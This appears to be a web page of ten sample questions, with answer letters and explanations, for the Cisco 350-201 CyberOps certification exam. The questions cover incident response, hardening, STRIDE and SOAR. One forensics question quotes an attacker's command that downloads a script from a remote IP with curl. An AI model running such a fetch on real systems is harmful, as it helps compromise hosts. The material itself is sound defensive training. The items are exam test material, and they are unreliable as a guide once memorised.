350-201 Sample Questions & Answers
Data-analytic techniques and threat intelligence tie with threat modeling, forensics and malware analysis for the top weight, alongside playbook-driven response scenarios, and scripting for security orchestration and automation.
Launch the full 350-201 simulator →Showing 10 of 20 free samples.
- Question 1Beginner
Techniques · Apply security hardening and controls
A cybersecurity architect is designing a security posture for a hybrid cloud environment. A key requirement is to prevent endpoints from connecting to known malicious domains, IPs, and URLs, regardless of whether the endpoint is on the corporate network or connected remotely. The solution must provide DNS-layer security and act as a secure web gateway. Which Cisco security product is best suited to meet these requirements?
Show answer & explanation
Correct answer: C
Cisco Umbrella is a cloud-delivered security service that provides the first line of defense against threats on the internet. It fulfills the requirements by offering DNS-layer security to block requests to malicious destinations before a connection is established, and it can also act as a secure web gateway for more in-depth inspection. It is effective for both on-premise and remote users.
- Question 2Beginner
Automation · Describe the components of a CI/CD pipeline
True or False: In a CI/CD pipeline, static application security testing (SAST) is performed on running code in a production or staging environment to identify vulnerabilities.
Show answer & explanation
Correct answer: B
The statement is false. Static Application Security Testing (SAST) analyzes an application's source code, byte code, or binary code for vulnerabilities without executing it. The described process of testing a running application is Dynamic Application Security Testing (DAST).
- Question 3Intermediate
Cybersecurity Fundamentals · Apply the incident response workflow
A financial services company, FinSecure, is undergoing a security audit. The auditor needs to review the company's incident response procedures. FinSecure's SOC uses a playbook for handling suspected phishing attacks that result in a user credential compromise. The playbook is initiated when a user reports a suspicious email, which is then analyzed by a SOAR platform.
The SOAR platform automatically extracts indicators (URLs, attachment hashes) and enriches them using threat intelligence feeds. If an indicator is found to be malicious, an alert is generated. The playbook requires a SOC analyst to then perform several actions: force a password reset for the affected user, search email logs for other recipients of the same phishing email, and block the malicious indicators at the firewall and web proxy.
According to the standard NIST incident response lifecycle (SP 800-61), which phase encompasses the analyst's actions of resetting the password and blocking the indicators?
Show answer & explanation
Correct answer: C
The analyst's actions fall within the 'Containment, Eradication, & Recovery' phase. Specifically, forcing a password reset and blocking the malicious indicators are containment actions. They are designed to stop the incident from causing further damage and to prevent the threat actor from maintaining access. Detection & Analysis is the phase where the email is analyzed and confirmed as malicious.
- Question 4Beginner
Processes · Determine steps to investigate common types of cases
While investigating a compromised Linux host, an analyst discovers that the attacker gained initial access and then downloaded a script from a remote server using the command
curl -o /tmp/p.sh http://198.51.100.10/p.sh. The analyst needs to understand the script's contents without executing it. Which command should the analyst use to safely view the script?Show answer & explanation
Correct answer: C
The
catcommand (or alternatives likelessormore) is used to display the contents of a file to standard output. This allows the analyst to read the script without executing any of its commands. Theshandsourcecommands would execute the script, which is dangerous. - Question 5Intermediate
Techniques · Determine patching recommendations based on scenarios
A security team uses a vulnerability scanner that reports a critical vulnerability (CVSS score 9.8) on an internal web server. However, the team determines that the server is located on a highly segmented network, is not accessible from the internet, and has a compensating control in place that mitigates the specific attack vector. How should this vulnerability be handled in the vulnerability management process?
Show answer & explanation
Correct answer: C
The CVSS score represents the technical severity of a vulnerability, but not the actual risk to the organization. The risk should be evaluated based on context, including asset criticality, exposure, and compensating controls. In this case, the mitigating factors significantly lower the actual risk. The correct process is to document these factors, formally accept the risk (if it's within tolerance), and potentially lower the priority of patching.
- Question 6Intermediate
Automation · Interpret scripts to automate security tasks
A SOC analyst needs to write a bash script to parse a log file (
auth.log) and count the number of failed SSH login attempts for a specific user, 'jdoe'. Which command correctly accomplishes this task?Show answer & explanation
Correct answer: A
This command pipeline correctly performs the task.
cat auth.logreads the file,grep 'Failed password for jdoe'filters for lines containing the specific failure message for the user 'jdoe', andwc -lcounts the number of resulting lines, giving the total count of failed attempts. - Question 7Intermediate
Processes · Prioritize components in a threat model
An organization is deploying a new web application and wants to incorporate threat modeling into its development lifecycle. The security team decides to use the STRIDE methodology. Which of the following threats maps directly to the 'Elevation of Privilege' category in STRIDE?
Show answer & explanation
Correct answer: B
Elevation of Privilege in the STRIDE model refers to an attacker gaining capabilities they are not entitled to. A regular user exploiting a vulnerability to gain administrative rights is the canonical example of this threat category. Data modification in transit is Tampering, intercepting data is Information Disclosure, and pretending to be another user is Spoofing.
- Question 8Intermediate
Techniques · Apply security hardening and controls
A security analyst is hardening a Cisco IOS router. To comply with company policy, the analyst must ensure that only specific, authorized administrators from the internal management network (10.10.10.0/24) can access the router via SSH. Which configuration snippet correctly applies this policy to the VTY lines?
Show answer & explanation
Correct answer: C
This configuration correctly creates a standard access list named MGMT_ACCESS that permits traffic from the 10.10.10.0/24 subnet. It then applies this access list to the VTY lines (0-4) in the inbound direction (
in) using theaccess-classcommand. This ensures that only SSH connections originating from the specified management network are allowed. - Question 9Beginner
Cybersecurity Fundamentals · Apply the incident response workflow
What is the primary purpose of the
recoveryphase in the NIST incident response lifecycle?Show answer & explanation
Correct answer: D
The recovery phase focuses on restoring systems to normal business operations after the threat has been eradicated. This includes activities like restoring systems from clean backups, rebuilding compromised systems, and validating that they are fully operational and secure before returning them to production.
- Question 10Intermediate
Automation · Compare concepts, platforms, and mechanisms of orchestration and automation
A SOC uses a playbook for ransomware incidents. Part of the playbook involves automatically isolating an infected endpoint using Cisco Secure Endpoint, enriching file hashes with Cisco Threat Grid, and creating a ticket in the incident management system. Which security concept does this automated, multi-tool workflow exemplify?
Show answer & explanation
Correct answer: A
This workflow is a prime example of SOAR. It involves Orchestration (coordinating actions across multiple disparate tools like Secure Endpoint, Threat Grid, and a ticketing system), Automation (executing these actions without human intervention), and Response (taking steps to contain and analyze the threat).
Ready for the real thing?
The full 350-201 simulator has every exam-style question, timed mode, and instant scoring.